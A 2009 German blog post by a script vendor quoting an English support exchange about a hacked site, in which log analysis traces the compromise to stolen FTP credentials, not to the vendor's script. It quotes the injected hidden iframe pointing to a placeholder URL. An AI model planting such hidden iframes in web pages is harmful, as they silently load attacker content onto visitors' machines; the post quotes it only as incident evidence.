Datum: 08.07.2009
, Kategorie:
Kunden,
Scripte,
Web Hosting
Hinweis: Es folgt eine etwas längliche Forums- und Mail-Korrespondenz. :-P
Letztens schrieb ein Kunde folgendes im Support-Forum:
Script Vulnerability!
Today my site, which uses the short URL script, was "hacked" via the script using iframe injection in to a few PHP files, according to my hosting company.
When I went to my site, the main page was not working at all. It displayed a php error for index.php. When I went to that file, I found the following code at the bottom of the file:
Code:
<iframe src="http://example.com
<iframe src="http://example.com/path/file.cgi?parameter" width=125 height=125 style="visibility: hidden"></iframe>
Obviously, I never added this code. When I contacted my hosting company, they said that it was not due to anyone taking over my account, but rather a vulnerability in the short URL script that allows iframe injection.
Der Kunde ließ uns FTP-Zugang, Zugang zum Control Panel des Web-Accounts und die FTP-Logdatei zukommen. Das Ergebnis war, dass es kaum möglich sein konnte, dass unser Script für das Problem verantwortlich war. Für das Ändern der Dateien wurde der FTP-Account des Kunden genutzt. Hätten die Hacker jedoch eine Lücke im Script benutzt, wäre die Aktivität in der Access-Log und nicht in der FTP-Log aufgetaucht. Das schrieben wir auch dem Kunden.
First of all you should change the passwords of all your FTP accounts and run a virus check on your computer. As the log file you've send me clearly states, someone used the FTP username "[gelöscht]" for downloading and uploading those files.
It is interesting that the webhosting people blame the script. The script doesn't know your FTP account. There is no way for anyone to get the script to tell them your FTP account (that I can see).
Even file inclusion - a popular hacking method - is not possible. The input from the form will be stored in the database. No inclusion of any file of the script depends on user input. Besides, if someone used the script to place that code on your server, it wouldn't show in the FTP log file. It would show in the access log file.
I've downloaded the access log files via your control panel. There is no unusual activity with the script around the time your server got hacked.
Also, the hackers didn't know what they were doing. While changing those files, they broke the script. But if they were able to know the script well enough to hack it, they wouldn't have broken it. They would have made sure that it continues to run smoothly so that nobody notices anything wrong. They would have hacked the HTML template files, not the PHP code files.
As far as I can see there are two possibilities here: Firstly, your webhosting company got hacked and someone stole a bunch of FTP accounts. Or secondly, someone installed a trojan horse or a keylogger on your computer and stole the FTP login this way.
I can't dismiss entirely the possibility, that the script got hacked. That wouldn't be the first time one of our scripts had a security hole. We always were able to find the bug and fix it within hours, but I can't see a connection between the hack and the Short URL script other than the script got changed during the hack.
If your webhosting company can provide evidence that our script is indeed the culprit, I'd happily use that evidence to fix the script.
If you have any questions, let me know.
Und hier die Antwort:
I contacted my hosting company again and sent them a copy of your e-mail. After further investigation they stated that your explanations are correct, and that the script is NOT at fault. We're still working out to determine the cause, however it was not the script. They were too quick to judge the script without first properly conducting an investigation in to the FTP logs, and I have made that complaint clear to them. I apologize for this and I thank you very much for your e-mail.
:-)